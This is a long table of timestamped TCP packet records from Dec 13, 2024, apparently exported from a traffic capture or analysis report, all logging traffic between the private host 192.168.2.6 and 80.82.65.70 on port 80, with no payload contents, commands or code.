                                              Dec 13, 2024 10:49:16.577146053 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.577194929 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.577225924 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.577379942 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.578027010 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.578067064 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.578131914 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.578176975 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.578990936 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.579008102 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.579051971 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.579072952 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.641002893 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.641072989 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.641093016 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.641132116 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.641390085 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.641442060 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.641473055 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.641514063 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.642338991 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.642400980 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.642457962 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.642642975 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.643194914 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.643256903 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.643464088 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.643522024 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.643568993 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.643632889 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.644388914 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.644438028 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.644448996 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.644486904 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.645332098 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.645374060 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.645421982 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.645461082 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.646291018 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.646341085 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.646384954 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.646588087 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.647284031 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.647344112 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.647363901 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.647404909 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.648155928 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.648202896 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.648221970 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.648240089 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.649158955 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.649173975 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.649218082 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.649943113 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.649987936 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.649987936 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.650031090 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.650902033 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.650944948 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.651026964 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.651071072 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.651814938 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.651945114 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.651997089 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.652738094 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.652798891 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.652827024 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.652895927 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.653696060 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.653745890 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.653789043 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.654531002 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.654578924 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.654637098 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.654706955 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.655459881 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.655507088 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.655656099 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.655725956 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.656439066 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.656486988 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.656543016 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.656584024 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.657336950 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.657380104 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.657409906 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.657669067 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.658291101 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.658354998 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.658380985 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.658422947 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.659163952 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.659282923 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.659326077 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.660171032 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.660219908 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.660258055 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.660298109 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.661081076 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.661122084 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.661135912 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.661163092 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.662029982 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.662075996 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.662110090 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.662153959 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.662914991 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.662967920 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.662990093 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.663033009 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.663804054 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.663902044 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.663902998 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.663935900 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.664762020 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.664788008 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.664807081 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.664832115 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.665740967 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.665786982 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.665887117 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.665925980 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.666614056 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.666706085 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.666755915 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.667567015 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.667618990 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.667861938 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.667901993 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.750890970 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.750911951 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.750998974 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.751369953 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.751384020 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.751425982 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.751451015 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.752371073 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.752387047 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.752449989 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.753654957 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.753668070 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.753704071 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.753729105 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.754008055 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.754021883 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.754076958 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.754754066 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.754795074 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.754831076 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.754913092 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.756016016 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.756028891 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.756073952 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.756581068 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.756627083 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.756789923 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.756827116 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.757638931 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.757654905 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.757689953 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.758601904 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.758614063 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.758654118 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.758682966 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.759497881 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.759510994 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.759558916 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.760268927 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.760409117 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.760463953 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.761168003 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.761326075 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.761348963 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.761388063 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.762310028 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.762315989 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.762360096 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.763058901 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.763117075 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.763125896 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.763171911 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.764077902 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.764091015 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.764142990 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.764941931 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.764992952 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.765141964 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.765183926 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.765820980 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.765867949 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.765928984 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.765969038 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.766772985 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.766829014 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.766891003 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.766938925 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.767805099 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.767817020 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.767853975 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.767867088 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.769505024 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.769516945 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.769561052 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.769579887 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.769624949 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.769692898 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.769736052 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.770765066 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.770777941 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.770823002 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.771356106 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.771405935 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.832976103 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.832993984 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.833045006 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.833292961 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.833307981 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.833350897 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.834059000 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.834106922 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.834254980 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.834304094 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.835206032 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.835222960 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.835268974 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.835715055 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.835783958 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.835810900 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.835833073 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.837481976 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.837498903 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.837532997 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.837538958 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.837567091 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.837621927 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.837677956 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.839071989 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.839096069 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.839121103 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.839158058 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.839346886 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.839448929 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.839467049 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.839492083 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.840379000 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.840425968 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.840661049 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.840720892 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.841315985 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.841336966 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.841376066 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.842189074 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.842205048 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.842248917 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.842273951 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.843177080 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.843193054 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.843216896 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.843283892 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.844062090 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.844217062 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.844295025 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.844352007 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.845077038 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.845089912 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.845120907 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.845155001 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.845973969 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.845994949 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.846035957 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.846048117 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.847373962 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.847390890 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.847485065 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.847485065 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.847634077 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.847687960 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.847839117 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.847879887 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.848917961 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.848931074 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.849035025 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.849035978 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.849503994 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.849544048 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.849562883 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.849606037 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.850414991 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.850538015 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.850709915 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.850799084 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.851355076 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.851408958 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.851438046 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.851622105 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.852591991 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.852605104 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.852646112 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.853825092 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.853842974 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.853879929 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.853903055 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.855041981 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.855056047 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.855068922 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.855087996 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.855114937 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.855309010 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.855444908 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.855932951 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.855972052 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.856057882 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.856103897 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.857781887 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.857795954 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.857808113 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.857841015 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.857877970 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.858844042 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.858856916 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.858871937 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.858885050 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.858901024 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.858917952 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.859843969 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.859855890 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.859893084 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.943065882 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.943089962 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.943145990 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.943182945 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.943185091 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.943234921 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.943352938 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.943394899 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.944272995 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.944288015 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.944314003 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.944329977 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.944852114 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.944891930 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.944961071 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.945156097 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.945826054 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.946079969 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.946732998 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.946748018 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.946762085 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.946784019 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.946813107 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.947979927 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.947998047 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.948024988 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.948050022 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.949105978 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.949114084 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.949166059 CET4985880192.168.2.680.82.65.70
